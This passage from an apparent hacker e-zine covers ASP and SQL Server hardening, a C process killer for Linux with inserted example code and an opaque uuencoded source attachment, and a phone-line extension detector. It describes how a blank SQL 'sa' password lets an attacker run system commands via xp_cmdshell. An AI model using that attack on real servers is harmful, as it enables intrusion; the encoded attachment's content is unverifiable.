: site, and ensures that only users with a particular privilege level are
: allowed access. The checking routine can be placed in an include file,
: and included at the top of each script where access has to be checked:
:
: <!--#INCLUDE FILE="members.inc" -->
:
: Other values commonly stored in session variables include usernames and
: permission levels. Session variables are cleared on the server after a
: default 20 minutes of inactivity (Session.Timeout).
:
:
: Microsoft SQL Server
: --------------------
:
: A very common but often unnoticed problem with Microsoft SQL Server 7.0 is
: that its default "sa" account can be left with a blank password. To exploit
: this, an attacker simply points the SQL management console at your SQL
: server, reads database information, changes permissions, or executes
: system commands through the extended stored procedures (xp_cmdshell).
:
: It is extremely important that "sa" is given a strong password (the
: account itself cannot be dropped), and that access to TCP port 1433 (the
: default port Microsoft SQL Server listens on) is blocked from all hosts
: except the IIS server. Ideally the SQL server sits in a non-routable
: private address range off the live network segment, so it cannot be
: reached remotely at all.
:
: There is now a Linux command line client, linsql.c, that can be used to
: access and scan for Microsoft SQL servers. It is available from
: packetstorm (http://packetstorm.securify.com) and requires the FreeTDS
: library.
:
: Conclusion
: ----------
:
: Despite all the hype, ASP is and can be relatively secure. All it takes
: is good programming practice and a secure, patched IIS server.
:
: The purpose of this document was to be a basic introduction to secure
: ASP programming practices; it is meant to complement reference material
: (http://msdn.microsoft.com) and programming experience.
:
: Copyright 2001, black-hand
: (black@wiretapped.net, http://black.wiretapped.net)
: This document may only be reproduced in full.
:
:....
:
...[ ]........................................................................
: :
: #04 An automated process killer for Linux (in C) - icebsd :
: ---------------------------------------------- :
:.[_]........................................................................:
:
...:
:
: An automated process killer for Linux (in C)
: -- icebsd
: =======================================================
:
:
: As far as system administration goes, most of the chores done by a system
: administrator are 1) redundant, 2) unimportant, and 3) more often than
: not, something the administrator gets blamed for afterwards. So the
: question that came into my mind today (today being a boring Saturday) was
: whether a program could be made to emulate your typical bastard
: administrator from hell (BAFH - a spin-off from BOFH).
:
: The idea was to create a process killer which would kill processes based
: on certain attributes of the process. The reason for using Linux was
: obvious: the /proc filesystem is easy to use.
:
: In my initial thoughts of construction, I had devised the main objectives
: of the program:
:
: 1) It must raise its priority higher than other programs.
: - i.e. POSIX scheduling on Linux, or setpriority()
:
: 2) It must be quick, and use a small amount of memory.
: - i.e. no dynamic memory, e.g. linked lists :)
:
: 3) It doesn't have to be run by root, although running the program
: as root would *really* provide you with an automated BAFH.
: - i.e. johnsmith can run it too.
:
: 4) It should have emergency shell access, with higher priority
: than the program.
:
: 5) It would obviously need to read the /proc filesystem, and
: calculate the appropriate values and compare them with the user
: defined threshold levels.
: - i.e. /proc fs stats, and algorithms.
:
: 6) Finally, it should not kill processes run by "root" unless the
: user defined it to do so.
:
: I will now go through the topics listed above, describing the program
: without reproducing its code, in the hope that the reader can build the
: program themselves before actually seeing mine. (Source attached at the
: end of this text file.)
:
: 1) Raising Priority
: --------------------
: Raising the priority of a process can be done in two ways on a Linux
: system. One way is via the nice() system call, which lowers the process's
: nice value (root only, for negative values). The process is still an
: ordinary time-sharing process, though: the nice value is only a weight the
: scheduler uses against every other time-sharing process.
:
: The other way is to use the POSIX scheduler functions to move the program
: into the "real-time" scheduling class. Once it is there, it has a static
: priority that beats any process not in a real-time class, and the kernel
: will not demote it. Note the flip side: a runaway SCHED_FIFO process that
: never blocks will starve everything else on a uniprocessor, which is why
: the emergency shell in point 4 matters.
:
: To do this, you would use:
:
:     #include <sched.h>
:
:     struct sched_param sp;
:     sp.sched_priority = priority;   /* 1 .. sched_get_priority_max(SCHED_FIFO) */
:     if (sched_setscheduler(pid, SCHED_FIFO, &sp) == -1)   /* pid 0 = this process */
:         perror("sched_setscheduler");   /* EPERM unless running as root */
:
:
: In my program, I wrapped that into another function called
: raise_priority(). This function falls back to the generic UNIX function
: setpriority() if the POSIX call fails. On Linux that failure is EPERM
: for a non-root user, and setpriority() without root can only make the
: process nicer, so the fallback is mostly a courtesy.
:
: 2) Small and fast. Nothing fancy
: --------------------------------
: Because the program is now running at a scheduling level where a bug could
: slow down or hang the system, a small and fast program is preferable to a
: comparatively larger and slower (yet fancier) one.
:
: The idea is to read /proc without storing much in RAM, so no linked lists
: or similar. A directory-reading function such as scandir() would be
: inappropriate; a simple call to readdir() suffices. Let's see why.
:
:
: NAME
: scandir, alphasort - scan a directory for matching entries
:
: SYNOPSIS
: #include <dirent.h>
:
: int scandir(const char *dir, struct dirent ***namelist,
: int (*select)(const struct dirent *),
: int (*compar)(const struct dirent **, const struct dirent
: **));
:
:
: scandir() looks very convenient. It reads the directory named by its first
: argument and hands you a malloc()ed vector in namelist, which you then
: have to free() entry by entry. Convenient, but expensive.
:
:
: NAME
: readdir - read a directory
:
: SYNOPSIS
: #include <sys/types.h>
:
: #include <dirent.h>
:
: struct dirent *readdir(DIR *dir);
:
:
: This call is obviously better for this program, as readdir() returns a
: pointer to a static structure and allocates nothing per entry. It is
: less convenient as far as searching or sorting goes, but for this
: program it is fine.
:
: 3) And the question is: to run as root, or not to run as root.
: ---------------------------------------------------------------
: To raise your priority you need root access, but the rest of the program
: works fine as a normal user. So a simple compromise was made: you can
: run it as either, but as a normal user you can only automatically kill
: your own processes (kill() fails with EPERM on anyone else's).
:
: 4) A 'real-time' shell
: ----------------------
: A real-time shell is easily provided by forking, raising the child to the
: maximum priority and running a shell in it. This gives the user a prompt
: that will always get the CPU, from which the killer itself can be killed
: should it spin out of control.
:
: This was done in my program by calling raise_priority(1) instead of
: raise_priority(0).
:
: 5) Getting something useful from /proc
: --------------------------------------
: Firstly, to quickly brief on the /proc filesystem:
:
: * Every numeric directory is a pid (process id)
: * Inside a pid pseudo-directory, there are files which correlate to the
: attributes of the process.
: * The (UID) owner of the pseudo-directory is the owner of the process.
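:
: An added example (not icebsd's code) that puts the readdir() approach and
: the /proc layout above together: it walks /proc once, treats only purely
: numeric entries as processes, takes the process UID from the owner of the
: /proc/<pid> directory, and allocates nothing per entry. The names
: is_pid_dir, walk_proc and tally are mine; it assumes a Linux /proc is
: mounted.

```c
/* proc_walk.c - enumerate processes by reading /proc with readdir().
 * Added example, not icebsd's process killer; assumes a Linux /proc. */
#include <ctype.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* A /proc entry is a process only if its name is purely numeric
 * ("self", "net", "sys" and friends are not). */
int is_pid_dir(const char *name)
{
    if (*name == '\0')
        return 0;
    for (; *name; name++)
        if (!isdigit((unsigned char)*name))
            return 0;
    return 1;
}

/* Call cb(pid, uid, ctx) for every process. The UID is the owner of the
 * /proc/<pid> directory, which is the UID of the process. Returns the
 * number of processes visited, or -1 if /proc cannot be opened. */
int walk_proc(void (*cb)(pid_t, uid_t, void *), void *ctx)
{
    DIR *d = opendir("/proc");
    if (!d)
        return -1;
    int n = 0;
    char path[64];
    struct dirent *ent;
    struct stat st;
    while ((ent = readdir(d)) != NULL) {      /* static buffer: nothing to free */
        if (!is_pid_dir(ent->d_name))
            continue;
        snprintf(path, sizeof path, "/proc/%s", ent->d_name);
        if (stat(path, &st) != 0)             /* process exited between readdir and stat */
            continue;
        cb((pid_t)atol(ent->d_name), st.st_uid, ctx);
        n++;
    }
    closedir(d);
    return n;
}

struct tally { int total, root_owned, mine; };

static void count_cb(pid_t pid, uid_t uid, void *ctx)
{
    struct tally *t = ctx;
    (void)pid;
    t->total++;
    if (uid == 0) t->root_owned++;
    if (uid == getuid()) t->mine++;
}

int main(void)
{
    struct tally t = { 0, 0, 0 };
    int n = walk_proc(count_cb, &t);
    if (n < 0) { perror("/proc"); return 1; }
    printf("%d processes: %d owned by root, %d owned by uid %u\n",
           t.total, t.root_owned, t.mine, (unsigned)getuid());
    return 0;
}
```

: The stat() on each directory is what gives you the UID test from point 6
: for free; a process that exits between readdir() and stat() is simply
: skipped, which is the race you have to live with when reading /proc.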
:
: In particular, the "stat" file is the one we're after. It contains the
: start time, total CPU time, etc. Another important file is /proc/uptime,
: which you need in order to convert those values, because the process
: start time in /proc is counted from when the system booted. Both are
: expressed in clock ticks, 1/100th of a second on Linux 2.x x86 (check
: sysconf(_SC_CLK_TCK) rather than hard-coding 100). This also means the
: uptime and process timers will eventually wrap around (a 32-bit tick
: counter at 100 Hz wraps after about 497 days).
:
: At first glance, it's ambiguous. But after looking through the procps
: package, which contains the source code for "ps" and "top", it wasn't too
: difficult to assimilate the structure.
:
: bash$ cat /proc/1/stat
: 1 (init) S 0 0 0 0 -1 256 43 7891 160 18324 1 338 279 269 0 0 -1 0 30
: 901120 86 2147483647 134512640 134529764 3221225284 3221224232 1073873768
: 0 0 3622886140 671818755 1236245 0 0
:
: The first value is the PID of the program (which should also be the
: directory name). The word in parentheses is the name of the program, the
: filename passed to execve() truncated to 15 characters. Beware that this
: name may itself contain spaces or parentheses, so split the line at the
: LAST ')' rather than at the first space.
:
: The "S" character is the state character. It stands for "sleeping". Most
: processes spend their time doing this, i.e. idling and sleeping. Others
: show "R", which indicates that the process is runnable and using CPU time.
:
: From here on, values are counted from the one after the state character,
: which we'll call the 1st real value, since those are the values we care
: about. To keep things short I'll only explain the values you need to know.
:
: The 11th and 12th value are utime and stime respectively. Combined, they
: provide the attribute for "total cpu time actually used". This is not the
: same as "length of program time", which is described by the 19th value.
:
: The reason for this difference is that the "total cpu time actually used"
: is often less than the "length of program time" because of multi-tasking,
: which basically means the process only gets a slice of cpu-time, and not
: hog it 100% of the time.
:
: Two other values need to be known. That's the system uptime, which is from
: "/proc/uptime" -- it's the first value. And the current system time, which
: is gained via the C library's time() function.
:
: From there on, we can devise a simple formula to calculate the values we
: need:
:
:     process_seconds    = ((system_uptime * 100) - p_start) / 100;
:     process_tstart     = system_time - process_seconds;
:     process_total_time = p_utime + p_stime;   /* in 1/100th second */
:
: * process_seconds is the total length of time the program has been
: running, (in seconds of course). The 19th value we got (from
: /proc/###/stat) was actually a 1/100th of a second time value based from
: the start of system. Hence the usage of system_uptime in the formula
: above.
:
: * process_tstart is the start time, in time_t format (i.e. based on the C
: library's time(), instead of the system uptime)
:
: * process_total_time is the total amount of CPU time that has actually
: been used in 1/100th of a second.
:
: From those values, we can calculate the PCPU (percentage of the cpu used
: by the process) by dividing the process_total_time (once you convert it to
: seconds) with process_seconds and multiplying by 100 to get a percentage.
:
: Because process_total_time is in 1/100th of a second, it's value is as if
: it had already been multiplied by 100, so we don't need to do it.
:
: pcpu = process_seconds ? (process_total_time / process_seconds)
: : 0.0;
:
: (The ?-condition is to check to see if process_seconds is zero, to prevent
: a division by zero error.)
:
: By using the above values, you can check a user-defined threshold for
: killing or renicing the process to something more appropriate.
:
:
: /* check for nice threshold */
: if ((process_seconds < NICE_TIME) || (pcpu < NICE_PCPU)) {
: continue;
: }
: else {
: /* nice() the process using setpriority() */
: /* note: should probably check via getpriority()
: * but it doesn't really matter.
: * since you don't save a system call either way.
: */
: if (setpriority(PRIO_PROCESS, pid, NICE_VAL) == -1) {
: perror("setpriority - nice failed");
: }
: }
:
: /* check for kill threshold */
: if ((process_seconds < KILL_TIME) || (pcpu < KILL_PCPU)) {
: continue;
: }
: else {
: /* kill the process */
:
: if (kill((pid_t) pid, KILL_SIG) == -1) {
: perror("kill() failed");
: }
: else {
: printf("Process has been killed\n");
: ...
:
:
: 6) The obvious.
: ---------------
:
: As stated previously, the program should be wary of killing processes that
: have a UID of 0, because they are "root"-owned processes and killing them
: could be quite nasty. Obviously, another if-condition could be used to
: skip any process below a certain UID, so that all system accounts are safe
: from this program (e.g. those running as "bin", "news" or whatever). This
: has been left as an exercise for the reader.
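:
: Putting sections 5 and 6 together: the following is an added example, not
: icebsd's process_killer2.c. It parses a /proc/<pid>/stat line (splitting at
: the last ')' so a program name containing spaces or parentheses does not
: shift the fields), computes process_seconds, process_tstart and pcpu with
: the formulas above, and then applies the nice/kill thresholds with the UID
: exclusions from this section. The names procinfo, usage, policy and decide
: are mine; the two sample lines are constructed (the first is the
: /proc/1/stat line shown earlier, cut short after the values we use), and
: it assumes the Linux 2.x field order described above with the tick rate
: taken from sysconf(_SC_CLK_TCK).

```c
/* proc_usage.c - added example (not icebsd's process_killer2.c): parse a
 * /proc/<pid>/stat line, derive lifetime and %CPU, apply nice/kill thresholds. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

struct procinfo {
    pid_t pid; char comm[64]; char state;   /* comm may contain spaces or ')' */
    unsigned long utime, stime;             /* CPU ticks, 11th and 12th value after state */
    unsigned long long starttime;           /* ticks after boot, 19th value after state */
};

struct usage {                              /* outputs of the article's formulas */
    long process_seconds; time_t process_tstart;   /* lifetime; start as time_t */
    unsigned long long total_ticks; double pcpu;   /* utime+stime; lifetime %CPU */
};

enum action { ACT_SKIP, ACT_NICE, ACT_KILL };

struct policy {
    long nice_time; double nice_pcpu;       /* NICE_TIME, NICE_PCPU */
    long kill_time; double kill_pcpu;       /* KILL_TIME, KILL_PCPU */
    uid_t min_uid; int touch_root;          /* skip UIDs below min_uid; touch_root=0 spares UID 0 */
};

/* Constructed samples: the article's /proc/1/stat line (truncated) and a
 * process whose name contains spaces and parentheses. */
static const char SAMPLE_INIT[] =
    "1 (init) S 0 0 0 0 -1 256 43 7891 160 18324 1 338 279 269 0 0 -1 0 30 901120 86";
static const char SAMPLE_WEIRD[] =
    "123 (my (weird) prog) R 1 123 123 0 -1 4194304 10 0 0 0 500 250 0 0 20 0 1 0 1000000 0 0";

/* Anchor on the LAST ')' so a comm like "my (weird) prog" cannot shift the fields. */
int parse_stat(const char *line, struct procinfo *p)
{
    const char *lp = strchr(line, '('), *rp = strrchr(line, ')');
    if (!lp || !rp || rp < lp)
        return -1;
    p->pid = (pid_t)strtol(line, NULL, 10);
    size_t n = (size_t)(rp - lp - 1);
    if (n >= sizeof p->comm) n = sizeof p->comm - 1;
    memcpy(p->comm, lp + 1, n);
    p->comm[n] = '\0';
    /* after ')': state ppid pgrp session tty tpgid flags minflt cminflt majflt
     * cmajflt utime stime cutime cstime priority nice timeout itrealvalue starttime */
    int got = sscanf(rp + 1, " %c %*d %*d %*d %*d %*d %*u %*u %*u %*u %*u %lu %lu"
                             " %*d %*d %*d %*d %*d %*d %llu",
                     &p->state, &p->utime, &p->stime, &p->starttime);
    return got == 4 ? 0 : -1;
}

/* uptime: first field of /proc/uptime; now: time(NULL); hz: sysconf(_SC_CLK_TCK). */
void compute_usage(const struct procinfo *p, double uptime, time_t now, long hz, struct usage *u)
{
    double elapsed = uptime - (double)p->starttime / (double)hz;
    if (elapsed < 0)                        /* wrapped tick counter: clamp */
        elapsed = 0;
    u->process_seconds = (long)elapsed;
    u->process_tstart = now - u->process_seconds;
    u->total_ticks = p->utime + p->stime;
    u->pcpu = u->process_seconds > 0        /* guard the division by zero */
            ? 100.0 * ((double)u->total_ticks / (double)hz) / (double)u->process_seconds
            : 0.0;
}

/* UID exclusions first; a process over both thresholds is killed rather than reniced. */
enum action decide(const struct usage *u, uid_t owner, const struct policy *pol)
{
    if (owner == 0 ? !pol->touch_root : owner < pol->min_uid)
        return ACT_SKIP;
    if (u->process_seconds >= pol->kill_time && u->pcpu >= pol->kill_pcpu)
        return ACT_KILL;
    if (u->process_seconds >= pol->nice_time && u->pcpu >= pol->nice_pcpu)
        return ACT_NICE;
    return ACT_SKIP;
}

int main(void)
{   /* live run against this process; /proc/<pid> is owned by the process UID */
    char line[1024]; double uptime; struct procinfo p; struct usage u; struct stat st;
    struct policy pol = { 60, 50.0, 600, 90.0, 500, 0 };
    static const char *names[] = { "skip", "nice", "kill" };
    FILE *f = fopen("/proc/self/stat", "r");
    if (!f || !fgets(line, sizeof line, f) || parse_stat(line, &p) || stat("/proc/self", &st)) {
        perror("/proc/self"); return 1;
    }
    fclose(f);
    if (!(f = fopen("/proc/uptime", "r")) || fscanf(f, "%lf", &uptime) != 1) {
        perror("/proc/uptime"); return 1;
    }
    compute_usage(&p, uptime, time(NULL), sysconf(_SC_CLK_TCK), &u);
    printf("%d (%s) uid=%u alive %lds cpu %.2f%% -> %s\n", (int)p.pid, p.comm, (unsigned)st.st_uid,
           u.process_seconds, u.pcpu, names[decide(&u, st.st_uid, &pol)]);
    return 0;
}
```

: Built with 'cc -Wall proc_usage.c -o proc_usage' and run without arguments
: it reports on itself, which is a quick way to confirm the field offsets on
: whatever kernel you have before pointing the thresholds at other people's
: processes.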
:
: Syslogging was achieved quite easily with syslog(), and was a miscellaneous
: feature I thought of near the end of the program's construction.
:
: Portability is a problem, obviously, since only a system with a /proc
: filesystem could use this program.
:
: The TEST_ONLY option doesn't work, as I was too lazy to put in another
: #ifdef somewhere. :)
:
: There are many possible extensions to this program that weren't made, such
: as keeping the state of the processes in memory to compare their PCPU over
: a shorter time interval instead of their whole lifetime, which would help
: in detecting "surges" in CPU usage for logging or other reasons. But for
: reasons #1 and #2, this was not planned.
:
: Another fun extension would be to find out if the process has child
: processes, and kill them if they exceed a user-defined limit. This would
: allow it to kill off forkbombs, etc.
:
: Source
: ------
: The source "process_killer2.c.gz" is attached at the end of this textfile,
: so to extract it to a file, use 'uudecode' and 'gzip' like this:
:
: uudecode infosurge-8.txt && gzip -d process_killer2.c.gz
:
: where "infosurge-8.txt" is the filename of this text file; this leaves
: you with process_killer2.c in the current directory.
:
: Conclusion
: -----------
:
: "Keep it simple: as simple as possible, but no simpler."
: -- A. Einstein
:
: Whether you actually would use this program in the wild is up to you.
: Considering that I wrote this program in a few hours, you should probably
: take heed and look for bugs.
:
: As for whether or not the system administrator can pass the blame to the
: program for its actions... remains to be seen. :)

begin 664 process_killer2.c.gz
M'XL("`5Q.SH``W!R;V-E<W-?:VEL;&5R,BYC`+U:;7?31A;^[/R*J7O`4G!L
MA[8?&I/V4##@4Y>D<4*7+3T^LC2RU<B25B/%N"W_?9][9S22[$#9LWN6`\\$>
MS=RYK\\]]48;'XD@<BRQ/?:G4XC:*8YD/?*S1\\K,TV^71:ET(QW?%X]%H))8[
M\\3P?1KY<JH"/7LE8>DH&HDP"F8MB+<7+US?BY>5LP,_?1"HJQ+HHLK/A<+O=
M#E9).4CSU5"$:2YB4$I4E*Q$E.#[QBNB-!G0N=<7U]-GDS/Q-BW%QMN)-(EW
MHE02-T1*J#0LMEXN112*'79XJUSB4=J\\GZC,JWTSOD@.F-X68HHP2@+A"1\\R
MBC3D@YH;B;OH:Y2++<2,"CDP^ICJR];>G11)6HA<>D'S8)\\?$[?TE)4*Q81E
MCCVY\\)*`B/"64A4B@.8*(P_VKG)O([P"E_OVPJ<DUD8F!5@NUBT><6CC!9(,
M4B9^NJ%=I,>T+'A?F,9QNL4*T?'30)Z1.89'1\\-C\\64@(;T4T\\73EU>3R>*7
MZ?6K!;2V@-9XSY=1XL<EJ#]111"E@_5W[:4X6NZOY;B*UAJ+91)A[]Y&?RV#
MO7UJIX;%+I-J;RN65>$5AZM;+[IGM8@V\\G`UERHM<W_O2>@G1=Q>"J(<*FRO
MW4,R6B5>?"A`G&KIH=WGK%QEE&W_B'E1AJ'U$"\\NX!/U8^RNS#)_-9G-1'>X
MC)*A6G>9*%GQIK(S&SB1[PMX0V)C8!NI-3L>P@"!PG&=JNB]8)V7,7F'O)/D
MVVFY6M.9'*SX:Z*QX3!GST:XUIY"41V*Q>7%?/J/Q>75].)J>OUV,7_V:O+\\
M9C9]_5*8G6W^#GA[?D$!+;9>PNQYT.'N#TDA(0ASZ#0BH)3X646.4M"A\\R.>
M$N.TWE.-)_#_E4QD[L7`!8\\(+!&,42"]/M"A'1-+B5"@$U"1'+A:NDK;SR\\6
M8&WQ]/73V=M_3A97%_AR>77Q;#*?3^:5:-=K^-$ZC0-QY^61MXRE8I!",&(E
M+J4Z$PZL0OBT3<V2(.`I"1NC!"&8_`ZF"-]T,$MH7J2$#"Z3`MHMKJ<_38A/
MLJ^W24MH"]#D^47IQ8*<40`K<27"(F<KZ6.7SRYO/GJ,GF42$9`4W@K8=F=0
M.BAS1ENB<D%$EZF&&"6;_-/^/A\\PNJ>+$LCMN/J^#.L9=%*PQR56(Z*MYEJ^
M47N-F?]V;_'-TQGRC8`',N:E6ZG(+:(TCXH=9P[#0NU]Y"G_(UO,D4L:IA6.
MMX0:7+YWDU+60;*J,/H5F+,Z^G$ZFVDI&>*74@#!O8)5[B5-(YN814`0D:9^
M$1\\XQZDXH(0`#^\\;NV\\EY1SR>#AC"6]<10A8]GX?]'W)+!(Q'4T-DDH610RK
MI]M$W$5>I;\\PRE4Q:)NJ%N*K$=O@&\\!#4A8:TUJ[C/%H$WX:-R/G\\[/R8/-\\
M^E)\\2UNC!`Z<4`;TH'R'LKIGG`9'3[\\1#K9>3ZY^TBKWCCJ=#O&;#[,T1CYF
MY6C;VQMF%R\\7=`O1!QB3UGB;%IX!NN$LUY/YM;AX/7LK3@Q>ZSQLS,+%1@56
MD+OH,U0!7.EP0`"VPWY`"[L/OEE5'R19NFK!5]77OY'Y,H74)]J=`EEX46S*
M#DMI*>F""O$"KHI0O?0"6EL"@VH6RT9FL%+TV..)AF7A@+DWDZL?+N83D_1#
M!OM[JX*C+V6>PQ9=JI^"*$AZA2FZ;&5BRJZZ-HNKFNN22T1=+AU6@M9G;6G3
M*`6[N#@)HK"52JM<.A5;B@+B)9=:`X%.K"3UO;GUAYL7L\\EK<3IZ_#4K0J4`
MU6>/'A$FW%&Z2!,%NG%T6RD/A_$,P1R1>G/XZ+DX'3?60B]6M#@:'U$50RJD
MY66:QN,VV\\SZ"X,\\2AQ_]`^L0<<I:!><O9TL"A9`P"CH,_$*"MVC/\\EN?Y.C
MCSJHSTJ_T)7`(O.HU%39^*ASU-G(#6YQ'JJL+T:$,W_(-'14YKI@OJ.R@3E3
M8>^YO1O'X6B.?@X:ILR0N<-L\\OV+%],7%WT!ZJXX/Q<GIZ[X$]&<L3,YW<.S
M75S;Z>2R*/-$:Q;?/X`3LT0&&,,G\\."H`TZ2(G2Z$Z)V)E@!S6HGM*HF=Z32
MR+M#H%'Z'KQ+^*KV3<;7<!\\I.?=0+EC)'5J*`?4Q*;U#WX"*Y]#9QGM_#N-W
MV&3+\\=%G601GH4NM@!7,7%VSP`.GUAWQ"/H?V>J];V^M8J5#(&M!`*Q*E"^%
M3GY<]@$0"[GI@X].V:HJ;=N@RS=X(M&J%`W>SL2#@$6F#U!BG[3`"^Z8882=
M@O5$%A]I@X/&[Y00*=1AE3XR60\\`K?LYH#\\2*!<G(5%CK"6AZ?;.DF2W<0#Y
MX5V.VQ<.[7S$%XNA>.P:/R'/$']2%I@#!M)2B9,3.D\\;HTVYJ:L(S>,G[V"I
M-%V2:DD2L:L8-V[[W[SA>7`S0+:XSG?TU21;RGO`P,&@\\CZFR@]/'H]:$6)#
MA)[JO?8Z+DVJ&WY9HT2XI5X6RM-F96^G-):728+K*7GMMM[N^^K6CGP?%<XI
M?_Y`XD%`U`]H1PBB0^?%=(:4$&;LZ-2"1;[@Y[K-^U6#Z&\\XKD^%?7&<$5R$
MT&,(]2E'[^P;O.T+$#-X$1K=D<J+/%OFMPZ@I_LN;^H$<'%,.WKO1KTQ&3,I
MT0>$.]/Y;,DYAR9VJ;GERF3/_N'Y^>N;V4Q;.#3*0T,*Q>(^DC1.'/=,3"Y>
MB#!/-^)6[I:IEP<#S4>MI`^=&H#"<5M;1(/49!YK!5+7G+B\\\\RZ-D)/*(J6$
MYNN]SZ=7XAC]YM@"LVX^Q3%^U(ND>:&6E9HS%$L-U9><$?"3];-=IP*EG;+C
M!"XA'):+Z#@NUTN=RK0@$,8IZ(=$*J&VEN&A,#ZT*#/J-\\8:Z,P:=R#GW(@X
MI%K7>D!6?=)V7]"5^VYB'OF;@*Q7/V6$L6V5KOBHWEW%=2UD*B220*<_/:]2
MR/I)H/IVH4@++V8^48_+#;%%7Q;UD8)[IS&0+TC+)5V!4M6(F2U*?32#`/8#
M;3?/H6QR!5@+:D@S0EN$Z)!H=RO_YH?G@O732G9FOW:N*I:IG++EG*FK=`?'
M5`6409$<I/3`M.=?5)&B?<X`5$CQ$M(EAJ.A-F&7G'UIV?L"D=ABBX^(UHE[
MB"O?2T(GI$A]$(+DPY`VM7P%USM-3W+9MRI!YQJ:;GBKS1TM`D0Q]&,4Q@[#
MQ5%GNP;(H9E#TM=,4Y"<<Y"1YO'/(@8_J=1.&%?Q;Y[3AI/O@D7B;>2OH]_$
M$]$;]5SQUU]B_\\EWHO=MSW6)!KRK0.<CF8I*C"P4B#6R&64_4!"G0<FU-W/X
MZ3,/U;*-\\O4%C,0=RL?`"T#C<J"*!46W+2<^/:C0=_%AFW4IL+3G5`.7YGAE
MH)%QCP=;0A`*);YEO<NSN&XE-UH7PO@8WD;/763B4UTR-AW1'#7NU_:_M@/N
MI;C)U=7%U9E&P)!\\P(0&,)FK;A4%#7``>/I%FN]L?FN+9+*-AF:=B+1PV<YI
MX!6BO9).AZC.4-5C+5O#/>V.W%_GE,-Z;L\\L/SH77S,LJ]LH$UU7S$57.-$`
MO1"*;WC)6BK`--4Y1%IR=M4-+1NM6%-WZ"D33-R$;C*!&*31`+4>D#^G\\4`B
ML(5Z2&Z?B4.:C:1;;5NEPS;C0J_3?1"(YM^N62U%\\V_W_KUV4>\\+NGVL/"2V
MX-8?_^^S-UGL?6C!]S^B9Y!:N^!>?B!D<MI8=8P6$%%R4B$\\U9!8&3<.ZTQ!
M)FYDOY/]W-,Z8;,/M4E:(`2&$6BLQUG4GRO2)OU!"7LZQ+UHH34];3?*2=QI
MM<7XGDWCW'/=<'^O*WCOF1@-(!3KA''%*]+(.8"IOX.VH4G:]T'<?Q/N^_!W
M$*;M=+`?M8:K_<`U081JW+^ULT)HOAKALHHY)^PK^$D]H=.I@0WQI!Y4NA_!
M;5UU&LAM3$<KB-*C!+08MIMT#?K2_K1`1C03/5L,:/9I5+=J':-#-.TN"YK4
M!ZE4>O[!8T$4F>CU!M4F/36L"PA%!817M0D^S<ADQ"^GT!X,]"'FBO-6XUKJ
M8:MDT]=CB&I.VTYH=6M?GT;0)'7+8DS_H8+FEJ5H8O>9EK)3RI:E[%3RLRQE
MKJOM5$M/CQP]=G&UP-4,\\R,"\\P'W4,C&C3:]7>KKJ`P2SKON`_4..0+=&K_-
MBP+=8Z\\]F@&B-C.C8!ZTZ?=/MGYBQO:CH6QQBU*WJB"J&2GSHF>B#JW=S"=7
M?]$'_=(5(?Q_9M`4'<16PS<,UV9&V2B:#0=\\`3Z[X^I%`3H@^+)YF]NR:74T
M:QS-FD?MVXU@[X"&\\?J0_JX/ZAJ][EWV3JJ]DZJJ<EM[D&1:>W068_^LO+WY
MUJ=UA]E0G]_+`A4=/FDZH18!SAXT.3!LE"TRA>%&M-DQ\\WT^J]\\RZ7?S>ZKC
M_"3:.CA(799X\\QV5IO\\)TA3M(#H8A9HLOC;'7P0LG#GJ+L',]#9>E/`DS\\M7
M?E]/-8Z/\\>6.._.ZF[4#U_$]X4,IC(*'SJ%EZ/.CR^ES_8'"R1VS,U>.K7LO
M`+DL:;(DOK`UNAWJI,D)5>=#54(3D#BOQC>MWQ"H2MP&DO`O#J@U@3G_4@)-
M+:T[5QALSGTXJN&H(G&%`_I-@X%KE*5#8'%CD,H15<\\5;/_9'I".JEF9:=M.
MVQ*>#L3DO?1+E+O\\:GOIJ;7&#*83[$WFU+ZHC^OS=IYBY=QZA6]^R4+#44Z3
M:93'I);ZK3$/(>DW+-Q]ZE\\-Q"Q-LWM(Z[I=YZ@V-9-;TE+%NP."/P_$SV54
MM`W7J'%H<*2+&NC`7SL9'*G*6?2VI'?:.]-)@PLW9,=;1V<5/2&K.SW!*332
MQ4,CC1T8Z%2CEC*#T4T:2+N5>VBH-\\X<_OV#OC#_Z8ZZE?+JI*=/F&QG\\ET]
M.>/!E#25#=4?"``!*]$L/M]P:)OKN1)HI4J"!/H]#U%"Q[&1+XR22*UE+2#M
MH%FMKDANB-^1889Y64+3M^-:IX^-3AL#N?%]^[XR^PX&$/><A05C*3/G\\:<N
F_E?O3.A//X/T??F8\\8I`A:"CT88;=8[VSVW\\#A(;.O\\$E````
`
end
:
:....
:
...[ ]........................................................................
: :
: #05 Phone extension warning device - Black_Smurf :
: -------------------------------- :
:.[_]........................................................................:
:
...:
:
: Have you ever been in a situation where you're talking in a private
: conversation, say to your girlfriend, and your sister picks up on the
: other phone? You didn't hear that little 'click'. Things are getting
: pretty hot on the line. Your sister hears it all. It gets worse - she
: managed to record it as well. I smell blackmail. This little project
: will detect if more than one phone is picked up on the same line and
: indicate it silently with an LED.
:
: Theory
: ------
:
: With both phones on the hook the phone line voltage is about 50 volts. If a
: phone is picked up this voltage drops to about 15 volts. The circuit
: detects the drop in line voltage and lights a green LED if any phone is
: picked up. A voltage divider made up of a 1M, a 470K and a 100K resistor
: reverse-biases the base of a BC 557 transistor. This keeps the transistor
: switched off, so the LED is not illuminated. When the line voltage
: falls, the base voltage is pulled lower than 3v (about 2.3v) by the 100K
: resistor, and the transistor turns on.
:
: Connected between your phone and the exchange is a series bridge with a
: 220R resistor. When your phone is lifted it puts a voltage across the 220R,
: so a 'turn off' voltage is generated on the base of the second BC 557
: transistor, which keeps the red LED off. The red LED indicates if another
: phone is picked up: when that phone is lifted the voltage across the 220R
: falls off and the red LED lights up. The 220R resistor is used to multiply
: the voltage drop caused by the second phone to about 2v so it can be
: detected reliably.
:
: Parts
: -----
:
:   2 - 100R resistors
:   1 - 220R resistor
:   3 - 100K resistors
:   2 - 470K resistors
:   1 - 1M resistor
:   1 - 1M mini trim pot
:   8 - 1N4148 diodes
:   2 - BC 557 transistors
:   1 - green LED
:   1 - red LED
:   2 - AA cells
:   1 - SPDT slide switch (single pole double throw.. was that a question in
:       the electronics exam, Phase?)
:   1 - phone tee piece
:   1m - 3 wire ribbon cable
:   1 - black box if you want
:   2 - 15 hook-up wires
